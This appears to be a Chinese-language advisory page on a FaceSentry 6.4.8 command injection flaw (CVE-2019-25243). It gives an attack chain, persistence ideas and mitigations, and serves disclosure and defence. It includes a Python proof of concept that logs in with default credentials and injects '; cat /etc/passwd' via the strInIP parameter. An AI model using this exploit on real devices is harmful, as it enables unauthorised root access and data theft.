CVE-2019-25243 CVSS 8.8 高危

CVE-2019-25243 FaceSentry 远程命令注入漏洞

披露日期: 2025-12-24

来源: [email protected]

漏洞信息

漏洞编号

CVE-2019-25243

漏洞类型

远程命令执行

CVSS评分

8.8 高危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

FaceSentry

漏洞概述

FaceSentry 6.4.8存在一处严重的认证后远程命令注入漏洞。该漏洞位于Web管理界面的pingTest.php和tcpPortTest.php脚本中。由于这些脚本对用户输入的'strInIP'和'strInPort'参数缺乏有效的输入过滤和验证，攻击者可以通过在参数中注入任意Shell命令来实现远程代码执行。由于目标设备通常以root权限运行Web服务，成功利用此漏洞的攻击者可以完全控制目标系统，执行任意系统命令、安装后门、窃取敏感数据或将其作为进一步攻击内网的跳板。此漏洞需要攻击者具备低权限认证账号，但无需用户交互即可完成攻击，CVSS评分高达8.8分，属于高危漏洞。

技术细节

该漏洞的根本原因在于PHP脚本对用户可控输入的信任。在pingTest.php和tcpPortTest.php中，程序直接使用HTTP请求中的'strInIP'和'strInPort'参数构建系统命令，而未进行任何命令注入防护。攻击者可通过在参数值中插入分号、管道符等Shell元字符来终结当前命令并注入恶意命令。例如，在'strInIP'参数中提交'127.0.0.1;whoami'即可执行额外的whoami命令。由于Web服务通常以root或高权限用户运行，注入的命令也以相同权限执行。攻击者常利用此漏洞通过反弹Shell、下载并执行恶意脚本等方式建立持久化访问。典型的利用方式包括：写入SSH公钥、添加Cron任务、下载植入后门程序等。

攻击链分析

STEP 1

步骤1

获取FaceSentry系统低权限账号（通过默认口令、暴力破解或社工手段）

STEP 2

步骤2

登录Web管理界面，访问pingTest.php或tcpPortTest.php页面

STEP 3

步骤3

在'strInIP'或'strInPort'参数中注入Shell命令，如：127.0.0.1;whoami

STEP 4

步骤4

发送请求，触发命令注入，执行注入的恶意命令

STEP 5

步骤5

以root权限执行任意系统命令，建立持久化访问或完全控制目标系统

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2019-25243 PoC - FaceSentry Command Injection
# Target: FaceSentry 6.4.8
# Vulnerable Endpoint: /pingTest.php or /tcpPortTest.php
# Attack Vector: strInIP parameter

import requests
from urllib.parse import urlencode

target = "http://target.com"
username = "admin"
password = "admin"

# Authentication
session = requests.Session()
login_data = {"username": username, "password": password}
session.post(f"{target}/login.php", data=login_data)

# Command Injection via strInIP parameter
injected_cmd = "; cat /etc/passwd"
params = {"strInIP": f"127.0.0.1{injected_cmd}"}
response = session.get(f"{target}/pingTest.php", params=params)

print(f"Status: {response.status_code}")
print(f"Response: {response.text}")

影响范围

FaceSentry < 6.4.8

FaceSentry 6.4.8

防御指南

临时缓解措施

在官方补丁发布前，可采取以下临时措施：1) 通过防火墙限制对Web管理界面的访问，仅允许可信IP访问；2) 禁用或限制pingTest.php和tcpPortTest.php等诊断功能；3) 监控Web日志中的异常请求模式；4) 对所有管理账户使用强密码并定期更换；5) 考虑在网络层隔离FaceSentry设备，防止横向移动。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2019-25243
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2019-25243
3 Details https://www.cvedetails.com/cve/CVE-2019-25243/
4 VulDB https://vuldb.com/cve/CVE-2019-25243
5 Link http://www.iwt.com.hk
6 Link https://www.exploit-db.com/exploits/47064
7 Link https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5523.php
8 Link https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5523.php

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表